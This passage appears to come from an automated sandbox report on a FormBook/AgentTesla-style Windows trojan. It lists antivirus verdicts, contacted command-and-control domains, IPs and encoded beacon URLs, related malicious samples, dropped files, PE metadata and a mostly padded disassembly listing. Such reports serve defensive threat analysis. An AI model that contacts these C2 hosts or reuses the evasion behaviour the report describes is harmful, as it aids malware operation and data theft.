29 firefox.exe 22->29         started        process13 dnsIp14 39 bpgroup.site 74.48.143.82, 49926, 80 TELUS-3CA Canada 25->39 41 www.moviebuff.info 209.74.77.109, 50013, 50014, 50015 MULTIBAND-NEWHOPEUS United States 25->41 43 8 other IPs or domains 25->43 63 Found direct / indirect Syscall (likely to bypass EDR) 25->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                BcF3o0Egke.exe71%VirustotalBrowse
                BcF3o0Egke.exe96%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                BcF3o0Egke.exe100%AviraHEUR/AGEN.1306657
                BcF3o0Egke.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.tempatmudisini06.click/4iun/?rr=BbldmNsp8&e6sH8=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpuauCK8BCe9zqr6jRwciKumWtZPYXukZtwjz9MdHPx1eFIw==0%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/4iun/0%Avira URL Cloudsafe
                http://www.snehasfashion.shop/2lci/?rr=BbldmNsp8&e6sH8=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNCiHfOCZyv1qYWJ1bwu2fvFY8APk0KaeRNG0Pv4PAhLvZA==0%Avira URL Cloudsafe
                http://www.hm35s.top/lazq/?e6sH8=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVVX0RGb+5s2kSkhaf40FF0423J1jVorSDRX3Mt1+1Y+N0g==&rr=BbldmNsp80%Avira URL Cloudsafe
                http://www.snehasfashion.shop/2lci/0%Avira URL Cloudsafe
                https://kb.fastpanel.direct/troubleshoot/0%Avira URL Cloudsafe
                http://www.windsky.click/gybb/?rr=BbldmNsp8&e6sH8=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4IQcXwxluILOpqvLxjlac2zTW2ZjXnd6ITs8lfiKZkyKwA==0%Avira URL Cloudsafe
                http://www.whisperart.net/rfcw/0%Avira URL Cloudsafe
                http://www.whisperart.net0%Avira URL Cloudsafe
                http://www.sitioseguro.blog/s7xt/0%Avira URL Cloudsafe
                http://www.bookingservice.center/47f1/?e6sH8=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8CpTp0QkkBq1y4sNZ2ldFAdykoca83krEGIrLt+evp31gA==&rr=BbldmNsp80%Avira URL Cloudsafe
                https://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf100%Avira URL Cloudmalware
                http://www.cssa.auction/rjvg/100%Avira URL Cloudmalware
                http://www.bookingservice.center/47f1/0%Avira URL Cloudsafe
                http://www.windsky.click/gybb/0%Avira URL Cloudsafe
                http://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8100%Avira URL Cloudmalware
                http://www.hm35s.top/lazq/0%Avira URL Cloudsafe
                http://www.moviebuff.info/4r26/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                hm35s.top
                		154.23.184.95
                		truetrue
                  		unknown
                  www.whisperart.net
                  		199.59.243.228
                  		truetrue
                    		unknown
                    www.windsky.click
                    		46.253.5.221
                    		truetrue
                      		unknown
                      www.moviebuff.info
                      		209.74.77.109
                      		truetrue
                        		unknown
                        bpgroup.site
                        		74.48.143.82
                        		truetrue
                          		unknown
                          tempatmudisini06.click
                          		103.21.221.4
                          		truetrue
                            		unknown
                            snehasfashion.shop
                            		88.198.8.150
                            		truetrue
                              		unknown
                              www.sitioseguro.blog
                              		104.21.15.100
                              		truefalse
                                		high
                                cssa.auction
                                		107.167.84.42
                                		truetrue
                                  		unknown
                                  www.bookingservice.center
                                  		98.124.224.17
                                  		truetrue
                                    		unknown
                                    www.snehasfashion.shop
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.cssa.auction
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.bpgroup.site
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.tempatmudisini06.click
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.hm35s.top
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.whisperart.net/rfcw/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hm35s.top/lazq/?e6sH8=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVVX0RGb+5s2kSkhaf40FF0423J1jVorSDRX3Mt1+1Y+N0g==&rr=BbldmNsp8true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.snehasfashion.shop/2lci/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.snehasfashion.shop/2lci/?rr=BbldmNsp8&e6sH8=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNCiHfOCZyv1qYWJ1bwu2fvFY8APk0KaeRNG0Pv4PAhLvZA==true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tempatmudisini06.click/4iun/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.windsky.click/gybb/?rr=BbldmNsp8&e6sH8=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4IQcXwxluILOpqvLxjlac2zTW2ZjXnd6ITs8lfiKZkyKwA==true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.sitioseguro.blog/s7xt/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tempatmudisini06.click/4iun/?rr=BbldmNsp8&e6sH8=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpuauCK8BCe9zqr6jRwciKumWtZPYXukZtwjz9MdHPx1eFIw==true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bookingservice.center/47f1/?e6sH8=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8CpTp0QkkBq1y4sNZ2ldFAdykoca83krEGIrLt+evp31gA==&rr=BbldmNsp8true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.moviebuff.info/4r26/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hm35s.top/lazq/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.windsky.click/gybb/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.cssa.auction/rjvg/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.bookingservice.center/47f1/true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabregini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoregini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://kb.fastpanel.direct/troubleshoot/regini.exe, 00000007.00000002.3938423784.0000000006580000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936711834.000000000489E000.00000004.10000000.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000002.3936126173.000000000342E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.whisperart.netysdBLufRFxAq.exe, 00000009.00000002.3937654032.0000000004D14000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ac.ecosia.org/autocomplete?q=regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.comregini.exe, 00000007.00000002.3936711834.0000000004EE6000.00000004.10000000.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000002.3936126173.0000000003A76000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvfregini.exe, 00000007.00000002.3936711834.0000000004BC2000.00000004.10000000.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000002.3936126173.0000000003752000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchregini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  103.21.221.4
                                                                  		tempatmudisini06.clickunknown
                                                                  		9905LINKNET-ID-APLinknetASNIDtrue
                                                                  104.21.15.100
                                                                  		www.sitioseguro.blogUnited States
                                                                  		13335CLOUDFLARENETUSfalse
                                                                  46.253.5.221
                                                                  		www.windsky.clickBulgaria
                                                                  		44814BTEL-BG-ASBGtrue
                                                                  209.74.77.109
                                                                  		www.moviebuff.infoUnited States
                                                                  		31744MULTIBAND-NEWHOPEUStrue
                                                                  88.198.8.150
                                                                  		snehasfashion.shopGermany
                                                                  		24940HETZNER-ASDEtrue
                                                                  154.23.184.95
                                                                  		hm35s.topUnited States
                                                                  		174COGENT-174UStrue
                                                                  74.48.143.82
                                                                  		bpgroup.siteCanada
                                                                  		14663TELUS-3CAtrue
                                                                  199.59.243.228
                                                                  		www.whisperart.netUnited States
                                                                  		395082BODIS-NJUStrue
                                                                  107.167.84.42
                                                                  		cssa.auctionUnited States
                                                                  		53755IOFLOODUStrue
                                                                  98.124.224.17
                                                                  		www.bookingservice.centerUnited States
                                                                  		21740ENOMAS1UStrue

                                                                  General Information

                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1588352
                                                                  Start date and time:2025-01-11 01:19:49 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 22s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:9
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:BcF3o0Egke.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:c050dff0d7a2ba85b874106f24dd24687525f4ef7fd20485d3fb5660564ba6b5.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@9/2@10/10
                                                                  EGA Information:
                                                                  • Successful, ratio: 75%
                                                                  HCA Information:
                                                                  • Successful, ratio: 91%
                                                                  • Number of executed functions: 94
                                                                  • Number of non-executed functions: 280
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 20.109.210.53
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  103.21.221.4rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tempatmudisini06.click/0kli/
                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tempatmudisini06.click/4iun/
                                                                  SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tempatmudisini06.click/0kli/
                                                                  FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tempatmudisini06.click/kfzf/
                                                                  Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tempatmudisini01.click/abla/
                                                                  -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tempatmudisini01.click/iydt/
                                                                  UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.tempatmudisini01.click/iydt/
                                                                  RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tempatmudisini01.click/abla/
                                                                  Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tempatmudisini01.click/phdl/
                                                                  ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tempatmudisini01.click/lybf/
                                                                  104.21.15.100SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                  • www.sitioseguro.blog/k4tn/
                                                                  5674656777985-069688574654 pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.sitioseguro.blog/6o0x/
                                                                  46.253.5.2215CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                  • www.windsky.click/3jkd/
                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                  • www.windsky.click/gybb/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.windsky.click5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                  • 46.253.5.221
                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                  • 46.253.5.221
                                                                  www.whisperart.netDHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                  • 199.59.243.227
                                                                  SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                  • 199.59.243.227
                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                  • 199.59.243.227
                                                                  www.moviebuff.infofile.exeGet hashmaliciousFormBookBrowse
                                                                  • 209.74.77.109

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  BTEL-BG-ASBG5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                  • 46.253.5.221
                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                  • 46.253.5.221
                                                                  jAjWw92QKR.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                  • 46.253.4.252
                                                                  SecuriteInfo.com.FileRepMalware.16004.4080.exeGet hashmaliciousUnknownBrowse
                                                                  • 95.169.204.138
                                                                  SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exeGet hashmaliciousUnknownBrowse
                                                                  • 95.169.204.138
                                                                  file.exeGet hashmaliciousGCleaner, Raccoon Stealer v2Browse
                                                                  • 95.169.205.186
                                                                  xzQ4Zf3975.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                  • 95.169.205.186
                                                                  60lAWJYfsL.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                  • 95.169.205.186
                                                                  http://fwtnp.dfbf.maderclean.cl/giorgiobelfiore@dececco.itGet hashmaliciousUnknownBrowse
                                                                  • 185.7.219.103
                                                                  GVlpP9RL5tGet hashmaliciousMiraiBrowse
                                                                  • 95.169.222.123
                                                                  CLOUDFLARENETUSVCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.96.1
                                                                  ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.13.205
                                                                  yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.112.1
                                                                  JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                  • 104.16.185.241
                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.16.1
                                                                  http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                  • 188.114.97.3
                                                                  h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.96.1
                                                                  http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                  • 104.17.25.14
                                                                  http://txto.eu.org/Get hashmaliciousUnknownBrowse
                                                                  • 104.21.16.1
                                                                  LINKNET-ID-APLinknetASNIDaBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                                  • 103.21.221.87
                                                                  sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 139.10.29.3
                                                                  arm4.elfGet hashmaliciousMiraiBrowse
                                                                  • 139.44.142.78
                                                                  momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 139.41.98.162
                                                                  armv5l.elfGet hashmaliciousMiraiBrowse
                                                                  • 139.34.88.220
                                                                  DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                  • 139.16.152.234
                                                                  loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 139.10.78.207
                                                                  loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                  • 139.24.67.215
                                                                  powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 139.35.229.59
                                                                  x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 139.255.236.155

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BcF3o0Egke.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\BcF3o0Egke.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.34331486778365
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                  C:\Users\user\AppData\Local\Temp\7046-nn1K

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\regini.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                  Category:dropped
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.121297215059106
                                                                  Encrypted:false
                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):6.956374941943306
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:BcF3o0Egke.exe
                                                                  File size:1'014'272 bytes
                                                                  MD5:a04f2271ad163c1098d3ca9c311b53d0
                                                                  SHA1:4c3b52a43f8a0d4e29ab25342bd6cb19d4eb8442
                                                                  SHA256:c050dff0d7a2ba85b874106f24dd24687525f4ef7fd20485d3fb5660564ba6b5
                                                                  SHA512:1d515c5431587b142b2b48e5924e25542b896105e1b22fea84f6f45634805c256685968d7e51a03d529abb4cf3e65828336299824747d2d87d6aced098f143c2
                                                                  SSDEEP:12288:tU4z9QFwj/TJtAVusYUdw0uYFj9v9UE04Ywrod63ip:tUIaUMUsYEu34roOip
                                                                  TLSH:6325C53D09BD22EB80A5C79DCBE89827F614A46FB150ADA494D647A53347F4B34C323E
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*&................0..p............... ........@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:00928e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4f8e96
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0xB48F262A [Tue Dec 29 02:44:58 2065 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
